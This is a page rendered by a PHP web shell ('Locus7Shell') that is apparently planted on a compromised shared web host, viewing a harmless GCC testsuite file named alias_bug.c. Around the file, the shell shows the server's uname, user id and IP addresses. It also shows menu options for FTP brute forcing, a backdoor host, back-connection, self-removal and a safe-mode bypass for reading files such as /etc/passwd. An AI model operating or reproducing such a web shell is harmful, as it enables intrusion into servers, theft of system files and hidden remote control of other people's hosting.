Software: Apache. PHP/5.4.45 

uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue
Sep 17 08:14:20 UTC 2024 x86_64
 

uid=243112(mycochar) gid=100(users) groups=100(users)  

Safe-mode: OFF (not secure)

/home/mycochar/www/image/photo/gcc-12.3.0/gcc/testsuite/gcc.dg/tree-ssa/   drwxr-xr-x
Free 0 B of 0 B (0%)
Your ip: 216.73.216.77 - Server ip: 213.186.33.19
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    

[Enumerate]    [Encoder]    [Tools]    [Proc.]    [FTP Brute]    [Sec.]    [SQL]    [PHP-Code]    [Backdoor Host]    [Back-Connection]    [milw0rm it!]    [PHP-Proxy]    [Self remove]
    


Viewing file:     alias_bug.c (1.13 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/* { dg-do compile } */
/* { dg-options "-O2 -fno-strict-aliasing -fdump-tree-optimized" } */

typedef unsigned u32;
typedef unsigned short u16;
typedef unsigned char u8;
struct biosregs {
 union {
  struct {
   u32 edi;
   u32 esi;
   u32 ebp;
   u32 _esp;
   u32 ebx;
   u32 edx;
   u32 ecx;
   u32 eax;
   u32 _fsgs;
   u32 _dses;
   u32 eflags;
  };
  struct {
   u16 di, hdi;
   u16 si, hsi;
   u16 bp, hbp;
   u16 _sp, _hsp;
   u16 bx, hbx;
   u16 dx, hdx;
   u16 cx, hcx;
   u16 ax, hax;
   u16 gs, fs;
   u16 es, ds;
   u16 flags, hflags;
  };
  struct {
   u8 dil, dih, edi2, edi3;
   u8 sil, sih, esi2, esi3;
   u8 bpl, bph, ebp2, ebp3;
   u8 _spl, _sph, _esp2, _esp3;
   u8 bl, bh, ebx2, ebx3;
   u8 dl, dh, edx2, edx3;
   u8 cl, ch, ecx2, ecx3;
   u8 al, ah, eax2, eax3;
  };
 };
};
void initregs(struct biosregs *regs);
void intcall(u8 int_no, const struct biosregs *ireg, struct biosregs *oreg);
static u32 *const gp = (u32*) 0x32;
void keyboard_set_repeat(void)
{
 struct biosregs ireg;
 *gp = 10;
 initregs(&ireg);
 ireg.ax = 0x0305;
 intcall(0x16, &ireg, ((void *)0));
}

/* { dg-final { scan-tree-dump-times "ireg.*ax" 1 "optimized"} } */
 

Enter:
 
Select:
 

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
  - regexp 

Upload
 
[ ok ]

Make Dir
 
[ ok ]
Make File
 
[ ok ]

Go Dir
 
Go File
 

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.0058 ]--